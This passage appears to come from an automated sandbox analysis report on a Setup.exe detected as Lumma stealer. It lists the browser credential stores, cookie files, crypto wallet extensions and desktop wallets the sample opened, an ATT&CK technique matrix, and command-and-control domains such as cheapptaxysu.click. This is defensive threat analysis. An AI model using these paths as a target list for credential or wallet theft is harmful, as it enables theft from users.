              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 7412, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 7412, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information
              LSASS Memory221
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Setup.exe53%ReversingLabsWin32.Spyware.Lummastealer
              Setup.exe100%AviraPUA/InstallCore.Gen7
              Setup.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://crl.m&Ja0%Avira URL Cloudsafe
              http://wittsoft.blogspot.com0%Avira URL Cloudsafe
              https://cheapptaxysu.click:443/api100%Avira URL Cloudmalware
              https://cheapptaxysu.click/apij100%Avira URL Cloudmalware
              https://cheapptaxysu.click/6100%Avira URL Cloudmalware
              https://cheapptaxysu.click/apiL100%Avira URL Cloudmalware
              cheapptaxysu.click100%Avira URL Cloudmalware
              https://cheapptaxysu.click/apiO100%Avira URL Cloudmalware
              https://cheapptaxysu.click/l100%Avira URL Cloudmalware
              https://cheapptaxysu.click/apiy100%Avira URL Cloudmalware
              http://ocsp.sectigo.com0&0%Avira URL Cloudsafe
              https://cheapptaxysu.click/.?&100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              cheapptaxysu.click
              172.67.177.88
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                slipperyloo.latfalse
                  high
                  curverpluch.latfalse
                    high
                    tentabatte.latfalse
                      high
                      manyrestro.latfalse
                        high
                        https://cheapptaxysu.click/apifalse
                          high
                          bashfulacid.latfalse
                            high
                            cheapptaxysu.clicktrue
                            • Avira URL Cloud: malware
                            unknown
                            wordyfindy.latfalse
                              high
                              shapestickyr.latfalse
                                high
                                talkynicer.latfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.cloudflare.com/learning/access-management/phishing-attack/Setup.exe, 00000000.00000003.1817406294.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1817384635.000000000092A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabSetup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#Setup.exefalse
                                          high
                                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Setup.exefalse
                                            high
                                            http://ocsp.sectigo.com0Setup.exefalse
                                              high
                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#Setup.exefalse
                                                high
                                                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Setup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Setup.exefalse
                                                      high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Setup.exe, 00000000.00000003.1829687850.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1953120474.0000000003157000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1829793650.0000000003157000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1952888844.0000000003157000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cheapptaxysu.click/apijSetup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0Setup.exefalse
                                                          high
                                                          http://wittsoft.blogspot.comSetup.exefalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://cheapptaxysu.click:443/apiSetup.exe, 00000000.00000003.1827827492.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2005455140.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1817486494.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043435488.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1994725877.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiSetup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://x1.c.lencr.org/0Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/0Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSetup.exe, 00000000.00000003.1829793650.0000000003132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cheapptaxysu.click/apiySetup.exe, 00000000.00000002.2043435488.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
